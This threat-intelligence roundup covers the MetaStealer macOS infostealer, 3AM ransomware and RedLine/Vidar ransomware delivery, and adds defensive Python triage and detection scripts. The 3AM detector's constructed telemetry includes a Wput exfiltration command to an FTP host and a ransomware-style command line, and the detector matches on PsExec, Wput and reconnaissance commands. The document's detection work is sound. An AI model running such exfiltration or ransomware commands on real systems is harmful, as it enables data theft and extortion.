
CTI Roundup: Go Infostealers, 3AM Ransomware, & RedLine/Vidar Malware

New family of Go infostealers spreads in targeted attacks, researchers discover 3AM ransomware in the wild, and RedLine/Vidar threat actors pivot to ransomware

Emerging Issue

First in this week’s roundup, CTI examines a new family of infostealers called MetaStealer that targets the macOS platform. Next is a look at a new ransomware family called 3AM that was recently discovered in the wild. Also included is an overview of the RedLine and Vidar malware families and how the threat actors behind them are distributing ransomware payloads with the same delivery techniques they use to spread infostealers.

1. New family of Go infostealers spreads in targeted attacks

SentinelOne has been tracking and analyzing a new family of macOS infostealers called MetaStealer to learn how it differs from other recent stealers.

According to SentinelOne, many of the MetaStealer samples are distributed in malicious application bundles within a dmg file. The files have names indicating that the targets were business users of Mac devices. Some of the file names include “advertising terms of reference (MacOS presentation).dmg,” “CONCEPT A3 full menu with dishes and translations to English.dmg,” “AnimatedPoster.dmg,” and “Brief_Presentation-Task_Overview-(SOW)-PlayersClub.dmg.”

One version of MetaStealer was called “Conract for paymen & confidentiality agreement Lucasprod.dmg” (typos included in actual file name). This file was uploaded to VirusTotal with a comment from the victim detailing how they were lured. The victim notes that they were lured by someone posing as a design client who sent them a password-protected zip file containing the malicious dmg. Other MetaStealer versions have used names masquerading as Adobe files or software.

Malicious application bundles

The applications contained within the disk images have the minimum requirements for a macOS bundle: an Info.plist file, a Resources folder containing an icon image, and a MacOS folder containing the malicious executable. None of the samples seen by SentinelOne carried a code signature, not even an ad hoc one, so the threat actor would likely need to persuade the victim to override protections such as Gatekeeper.

The collected samples are single-architecture x86_64 binaries; on Apple Silicon (M1 and M2) machines they run only with the help of Rosetta. Samples of MetaStealer have been uploaded to VirusTotal regularly.
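A quick triage check for the bundle's main executable (Contents/MacOS/<name>), added here as an example and not SentinelOne's or the malware author's code: parse the Mach-O header to list the architectures and to see whether any slice carries an LC_CODE_SIGNATURE load command, which both Developer ID and ad hoc signing add. The sample binaries are constructed inline (headers and load commands only, no code) so the script runs offline; point it at a real file to triage a suspect bundle.

```python
import struct

# Mach-O constants from <mach-o/loader.h> and <mach-o/fat.h>
MH_MAGIC = 0xFEEDFACE        # 32-bit thin binary, little-endian on disk
MH_MAGIC_64 = 0xFEEDFACF     # 64-bit thin binary, little-endian on disk (x86_64 and arm64)
FAT_MAGIC = 0xCAFEBABE       # universal binary; fat headers are big-endian
MH_EXECUTE = 0x2
LC_UUID = 0x1B
LC_CODE_SIGNATURE = 0x1D     # linkedit_data_command pointing at the signature blob
CPU_TYPE_X86_64 = 0x01000007
CPU_TYPE_ARM64 = 0x0100000C
CPU_NAMES = {CPU_TYPE_X86_64: "x86_64", CPU_TYPE_ARM64: "arm64", 0x7: "i386"}


def parse_thin(data: bytes, base: int = 0) -> tuple:
    """Return (architecture, has_LC_CODE_SIGNATURE) for one thin Mach-O slice."""
    magic, cputype, _sub, _ftype, ncmds, sizeofcmds, _flags = struct.unpack_from("<7I", data, base)
    if magic == MH_MAGIC_64:
        off = base + 32          # mach_header_64 carries an extra 'reserved' field
    elif magic == MH_MAGIC:
        off = base + 28
    else:
        raise ValueError(f"not a little-endian Mach-O header at offset {base}: {magic:#x}")
    end = off + sizeofcmds
    signed = False
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmdsize < 8 or off + cmdsize > end:
            raise ValueError("malformed load command table")
        if cmd == LC_CODE_SIGNATURE:
            signed = True
        off += cmdsize
    return CPU_NAMES.get(cputype, f"{cputype:#x}"), signed


def parse_macho(data: bytes) -> list:
    """Return one (arch, signed) pair per slice; a thin binary yields a single pair."""
    if struct.unpack_from(">I", data, 0)[0] == FAT_MAGIC:
        nfat_arch = struct.unpack_from(">I", data, 4)[0]
        slices = []
        for i in range(nfat_arch):
            _cpu, _sub, offset, _size, _align = struct.unpack_from(">5I", data, 8 + 20 * i)
            slices.append(parse_thin(data, offset))
        return slices
    return [parse_thin(data, 0)]


def triage_macho(data: bytes) -> tuple:
    """Flag the two properties SentinelOne reported for the MetaStealer samples."""
    slices = parse_macho(data)
    arches = [arch for arch, _ in slices]
    findings = []
    if arches == ["x86_64"]:
        findings.append("single-architecture x86_64: runs on Apple Silicon only under Rosetta")
    if not all(signed for _, signed in slices):
        # Ad hoc signing also adds LC_CODE_SIGNATURE, so its absence means no signature at all.
        # Presence is not validity: confirm with `codesign -dvv --verify` and `spctl -a -vv` on a Mac.
        findings.append("no LC_CODE_SIGNATURE: unsigned, not even ad hoc; Gatekeeper blocks quarantined unsigned apps by default")
    return arches, findings


# --- constructed sample binaries: header plus load commands only, no code ---
def build_thin(cputype: int, signed: bool) -> bytes:
    cmds = struct.pack("<II", LC_UUID, 24) + bytes(16)             # LC_UUID with a zero UUID
    if signed:
        cmds += struct.pack("<IIII", LC_CODE_SIGNATURE, 16, 0, 0)  # dataoff/datasize left empty
    ncmds = 2 if signed else 1
    header = struct.pack("<8I", MH_MAGIC_64, cputype, 0, MH_EXECUTE, ncmds, len(cmds), 0, 0)
    return header + cmds


def build_fat(slices: list) -> bytes:
    """Pack thin slices into a universal binary (real linkers page-align slices; the parser does not care)."""
    offset = 8 + 20 * len(slices)
    entries, body = b"", b""
    for blob in slices:
        cputype = struct.unpack_from("<I", blob, 4)[0]
        entries += struct.pack(">5I", cputype, 0, offset, len(blob), 0)
        body += blob
        offset += len(blob)
    return struct.pack(">II", FAT_MAGIC, len(slices)) + entries + body


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:      # e.g. Suspect.app/Contents/MacOS/Suspect
        print(triage_macho(open(sys.argv[1], "rb").read()))
    else:
        print(triage_macho(build_thin(CPU_TYPE_X86_64, signed=False)))
        print(triage_macho(build_fat([build_thin(CPU_TYPE_X86_64, True), build_thin(CPU_TYPE_ARM64, True)])))
```

The check only answers "is there a signature at all and for which CPUs"; a present signature still has to be verified on a Mac, and a fat binary that carries an arm64 slice will run natively, which is why the Rosetta finding is limited to x86_64-only files.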

Obfuscated Go executable

The main executable is an Intel x86_64 Mach-O containing compiled and heavily obfuscated Go code.

The obfuscation method is similar to that used in obfuscated Sliver and Poseidon malware binaries. Despite obfuscation, researchers identified functions for exfiltrating the keychain, extracting saved passwords, and grabbing files. Some of the versions contain methods to target Telegram and Meta services.

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“MetaStealer’s emergence contributes to the recent trend of infostealers targeting Mac users. MetaStealer specifically targets business users of macOS devices, which is historically unusual for Mac malware that is typically distributed via cracked software or malvertising.”

“MetaStealer relies heavily on social engineering to lure victims into launching malicious payloads themselves. This is something that threat actors seem to be getting better and better at, therefore requiring us all to be more vigilant than ever.”

2. Researchers discover 3AM ransomware in the wild

Symantec has discovered a new ransomware family called 3AM in the wild. 3AM was detected in a single incident where an affiliate deployed the ransomware after an unsuccessful attempt to deploy LockBit in the network.

Background on 3AM ransomware

3AM is the name Symantec has given to the ransomware family based on references to 3AM in the ransom note and the appending of encrypted files with .threeamtime.

The ransomware is written in Rust and will attempt to stop multiple services before encrypting any files. After encryption is complete, it will attempt to delete Volume Shadow copies.

To date, 3AM ransomware has been very rarely observed. It was only seen in a single attack after a failed deployment of LockBit. At this time it is uncertain if its authors are linked to any known threat actors or groups.

Attack preparation

The first identified activity from the threat actor was use of the gpresult command to dump the policy settings enforced on the computer for a particular user. The threat actor then executed various Cobalt Strike components and tried to escalate privileges using PsExec, ran reconnaissance commands (whoami, netstat, quser, net share), and tried to enumerate other servers on the network for lateral movement. A new user was then added for persistence, and the Wput tool was used to exfiltrate files to an FTP server.

The threat actor first tried to deploy LockBit, but it was blocked on the network, forcing a switch to 3AM. Even that was only partially successful: the threat actor managed to deploy 3AM to just three machines, and on two of those the deployment was blocked.

3AM analysis

The ransomware is a 64-bit executable written in Rust. It recognizes the following command line parameters:

  • “-k” – 32 Base64 characters, referred to as the “Access key” in the ransom note
  • “-p” – Unknown
  • “-h” – Unknown
  • “-m” – Method; the code checks for one of two values before running the encryption logic:
      • “local”
      • “net”
  • “-s” – Determines offsets within files for encryption, to control encryption speed; expressed as decimal digits

The “-m” and “-h” parameters are mutually exclusive. The use of “-h” and “-m”, and the values “local” and “net”, closely resemble the arguments accepted by Conti. When run, 3AM attempts to execute a long list of commands, many of which try to stop security and backup-related software.

The ransomware then scans the disk for files that match predefined criteria, encrypts them and deletes the originals. 3AM then creates a file named “RECOVER-FILES.txt” in each scanned folder; this file contains the ransom note.

The encrypted files contain a marker string of 0x666 followed by the data appended by the ransomware. After completing its encryption routine, it will attempt to delete volume shadow backup copies.
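The reconnaissance sequence in “Attack preparation” and the command line shape, file extension and ransom note name above give a detection analyst enough for a first-pass rule. The following is an added example, not Symantec's code: it runs over constructed EDR-style process and file events (not data from the incident), flags a 3AM-looking command line (a 32-character Base64 “-k” key with exactly one of “-m local|net” or “-h”, plus an optional numeric “-s”), the .threeamtime extension and RECOVER-FILES.txt, and scores hosts where three or more of the reported reconnaissance commands ran. Treating the “-k” key as the required anchor, and the three-command threshold, are my tuning choices, not something the report states.

```python
import re
from collections import defaultdict

# 3AM command line as documented by Symantec: -k <32 Base64 chars>, -m local|net, -h, -s <digits>.
_KEY = re.compile(r"(?:^|\s)-k\s+([A-Za-z0-9+/=]{32})(?=\s|$)")
_METHOD = re.compile(r"(?:^|\s)-m\s+(local|net)(?=\s|$)")
_HFLAG = re.compile(r"(?:^|\s)-h(?=\s|$)")
_SPEED = re.compile(r"(?:^|\s)-s\s+(\d+)(?=\s|$)")

# Commands and tools named in the "Attack preparation" section; matched case-insensitively as substrings.
RECON_CMDS = ("gpresult", "whoami", "netstat", "quser", "net share")
TOOLING = ("psexec", "wput")


def parse_3am_cmdline(cmdline: str):
    """Return the parsed 3AM arguments, or None when the command line does not fit.
    Assumption (mine, not the report's): the 32-character -k key is the required anchor,
    and -m / -h must appear in the mutually exclusive form Symantec describes."""
    key = _KEY.search(cmdline)
    if key is None:
        return None
    method, hflag = _METHOD.search(cmdline), _HFLAG.search(cmdline)
    if (method is None) == (hflag is None):      # exactly one of -m / -h
        return None
    speed = _SPEED.search(cmdline)
    return {
        "key": key.group(1),
        "method": method.group(1) if method else None,
        "h": hflag is not None,
        "speed": int(speed.group(1)) if speed else None,
    }


def is_3am_file_artifact(path: str) -> bool:
    """Encrypted files get a .threeamtime suffix; each scanned folder gets RECOVER-FILES.txt."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name.endswith(".threeamtime") or name == "recover-files.txt"


def triage_3am_events(process_events, file_events) -> dict:
    """Group events per host and return {host: [finding, ...]} for hosts with at least one finding."""
    findings = defaultdict(list)
    seen = defaultdict(set)
    for ev in process_events:
        host = ev["host"]
        haystack = (ev["image"] + " " + ev["cmdline"]).lower()
        for name in RECON_CMDS + TOOLING:
            if name in haystack:
                seen[host].add(name)
        parsed = parse_3am_cmdline(ev["cmdline"])
        if parsed:
            findings[host].append(f"3AM-style command line: {parsed}")
    for ev in file_events:
        if is_3am_file_artifact(ev["path"]):
            findings[ev["host"]].append(f"3AM file artifact: {ev['path']}")
    for host, names in seen.items():
        recon = sorted(n for n in names if n in RECON_CMDS)
        tools = sorted(n for n in names if n in TOOLING)
        if len(recon) >= 3:                      # threshold is a tuning choice, not from the report
            note = f"pre-ransomware reconnaissance ({', '.join(recon)})"
            if tools:
                note += f" with {', '.join(tools)}"
            findings[host].append(note)
    return dict(findings)


# Constructed sample telemetry (not from the incident); the -k value is base64("0123456789abcdef01234567").
PROCESS_EVENTS = [
    {"host": "SRV01", "image": r"C:\Windows\System32\gpresult.exe", "cmdline": "gpresult /z"},
    {"host": "SRV01", "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami"},
    {"host": "SRV01", "image": r"C:\Windows\System32\NETSTAT.EXE", "cmdline": "netstat -an"},
    {"host": "SRV01", "image": r"C:\Windows\System32\net.exe", "cmdline": "net share"},
    {"host": "SRV01", "image": r"C:\Temp\wput.exe", "cmdline": r"wput C:\Temp\docs.7z ftp://198.51.100.7/up/"},
    {"host": "SRV01", "image": r"C:\Temp\svc.exe", "cmdline": "svc.exe -k MDEyMzQ1Njc4OWFiY2RlZjAxMjM0NTY3 -m local -s 10"},
    {"host": "WS07", "image": r"C:\Program Files\Tool\tool.exe", "cmdline": "tool.exe -k short -m local"},
    {"host": "WS07", "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /all"},
]
FILE_EVENTS = [
    {"host": "SRV01", "path": r"C:\Users\Public\Documents\budget.xlsx.threeamtime"},
    {"host": "SRV01", "path": r"C:\Users\Public\Documents\RECOVER-FILES.txt"},
    {"host": "WS07", "path": r"C:\Users\jdoe\notes.txt"},
]

if __name__ == "__main__":
    for host, notes in triage_3am_events(PROCESS_EVENTS, FILE_EVENTS).items():
        print(host)
        for note in notes:
            print("  -", note)
```

On the constructed data only SRV01 is reported: the command line, both file artifacts and the reconnaissance cluster with Wput. WS07 runs whoami once and a binary with a short -k value, which is exactly the noise the anchor and threshold are there to suppress.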

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“We don’t see a ton of reporting on threat actors that have tried to deploy one ransomware but switched to another when the first was blocked. And we see even less reporting on threat actors switching to ransomware that has never been seen before.”

“It seems like an interesting time to try out a new ransomware, using it as a backup plan instead of with intent. Since the 3AM ransomware was only partially successful, it could be that this threat actor is still developing 3AM and only pivoted to it because they had no other choice. Considering that it was used as a fallback by a supposed LockBit affiliate, it wouldn’t be a surprise to see more of 3AM in the future.”

3. RedLine/Vidar threat actors pivot to ransomware

Trend Micro has been tracking the RedLine and Vidar malware families since the middle of 2022. Both families have been used to target victims via spear-phishing. However, more recent investigations reveal the threat actors behind these malware families are now distributing ransomware payloads with the same delivery techniques they use to spread infostealers.

The threat actors are now seen first sending infostealer malware signed with EV code signing certificates, then sending ransomware payloads through the same route.

Background

Organizations receive extended validation (EV) code signing certificates once the certificate authority has verified their legal and physical existence in a country, an issuance process with more extensive identity verification than for regular code signing certificates. The process also requires the private key to be generated on a hardware token.

Despite the additional security measures introduced earlier this year, more than 30 EV code-signed samples tied to this campaign were used between July and August 2023. The Vidar infostealer used in this activity was polymorphic: every sample had a different hash. While threat actors have used EV certificates for malware before, Trend Micro notes this is the first time it has seen a single actor with this many signed samples. It is not yet known how the threat actor obtained access to the private key.

Technical analysis

Threat actors using RedLine and Vidar use common techniques to lure victims into running malicious files. This often includes spear phishing, using double extensions and LNK files, and transferring malicious files through Google Drive.

In a case Trend Micro investigated, the victim had been receiving infostealer malware from a series of campaigns since mid-July 2023. Then, on August 9, the victim received a ransomware payload after being tricked into downloading and opening a fake TripAdvisor complaint email attachment. The attachment used the common double-extension trick (.pdf.htm) to make the file look like a PDF.

After opening the attachment and clicking “read complaint,” the user unknowingly executed several JavaScript files, which in turn downloaded and ran “TripAdvisor Complaint-Possible Suspension.exe.” This executable connected to two URLs and read a PNG file, transforming its contents into encrypted shellcode. That shellcode was decrypted to produce a second shellcode, which was then injected.

The ransomware payload, detected as Ransom.Win64.CYCLOPS.A, was injected into rgb9rast.exe (a legitimate 7-Zip standalone console application). It then dropped the ransom note, encrypted files with a .knight_l extension, and made an outbound SMB connection to encrypt files on the network.

Additional indicators

The threat actors also used other file names for malicious files that were not EV code signed, such as “Additional informatoin about the reservation.exe” (with “informatoin” misspelled) and “TripAdvisor Complaint – Possible Suspension.exe ransomware.” These additional file names also used double extensions such as .jpg.exe and .pdf.exe.
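An attachment-name check for the double-extension lures in this section, added here as an example and not Trend Micro's code: it reports what Windows Explorer would display with the default “Hide extensions for known file types” setting, flags a document-looking extension followed by one that hands the file to a browser, script host or the program loader, flags .lnk attachments, and notes the campaign's lure vocabulary as a corroborating signal. The extension lists and the sample names are my own constructions modelled on the names described above.

```python
# Final extensions that hand the file to a browser, a script host or the program loader
# rather than to a document viewer (my list; the page itself names .exe, .htm and .lnk).
EXECUTING = {"exe", "scr", "com", "htm", "html", "js", "lnk", "hta", "vbs", "bat", "cmd"}
# Extensions a recipient expects to be inert documents or images.
DOCUMENT_LIKE = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "jpg", "jpeg", "png", "txt"}
# Lure vocabulary from this campaign's file names; reported as a corroborating signal only.
LURE_WORDS = ("complaint", "suspension", "reservation")


def classify_attachment(filename: str) -> dict:
    """Return the name Explorer would show, the reasons to block, and any lure words found."""
    name = filename.strip()
    parts = name.lower().split(".")
    exts = parts[1:]                      # "a.pdf.htm" -> ["pdf", "htm"]; "a" -> []
    last = exts[-1] if exts else ""
    reasons = []
    if last in EXECUTING and any(e in DOCUMENT_LIKE for e in exts[:-1]):
        decoy = next(e for e in reversed(exts[:-1]) if e in DOCUMENT_LIKE)
        reasons.append(f"double extension: displayed as a .{decoy} but opens as .{last}")
    if last == "lnk":
        reasons.append("Windows shortcut (.lnk) sent as an attachment")
    # With the default "Hide extensions for known file types" setting Explorer drops the final
    # registered extension, so "report.pdf.exe" is shown as "report.pdf"; .lnk is always hidden.
    displayed_as = name.rsplit(".", 1)[0] if exts else name
    return {
        "displayed_as": displayed_as,
        "reasons": reasons,
        "lure_words": [w for w in LURE_WORDS if w in name.lower()],
    }


def scan_attachments(names) -> list:
    """Return (name, classification) only for attachments with at least one reason to block."""
    flagged = []
    for n in names:
        c = classify_attachment(n)
        if c["reasons"]:
            flagged.append((n, c))
    return flagged


# Constructed sample names (not the campaign's actual file names).
SAMPLE_ATTACHMENTS = [
    "TripAdvisor Complaint-Possible Suspension.pdf.htm",
    "Additional informatoin about the reservation.jpg.exe",
    "booking-confirmation.lnk",
    "invoice-2023-08.pdf",
    "menu.en.docx",
]

if __name__ == "__main__":
    for name, c in scan_attachments(SAMPLE_ATTACHMENTS):
        print(f"{name!r} shown as {c['displayed_as']!r}: {'; '.join(c['reasons'])} lure={c['lure_words']}")
```

The last two sample names show the rule's intended false-negative behaviour: a plain .pdf and a multi-dot .docx are not flagged, because the check keys on what the final extension does, not on the number of dots.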

Analyst comments from Tanium’s Cyber Threat Intelligence Team

“Even though additional security measures were implemented, threat actors were still somehow able to distribute infostealing malware code signed with EV certificates.”

“It’s not yet known how the threat actor was able to obtain the private key needed to carry out this activity. This is something CTI hopes to learn more about in the future. Of more interest is the shift they made in this campaign from solely distributing malware to following up with ransomware payloads.”

“Given the popularity of ransomware over the past year (if not longer), it’s becoming more common to see threat actors jumping on the ransomware bandwagon.”



Tanium CTI

Tanium's Cyber Threat Intelligence (CTI) analysts process and extract trends from the daily cyber landscape to curate and deliver current intel to stakeholders around threats impacting business and security.
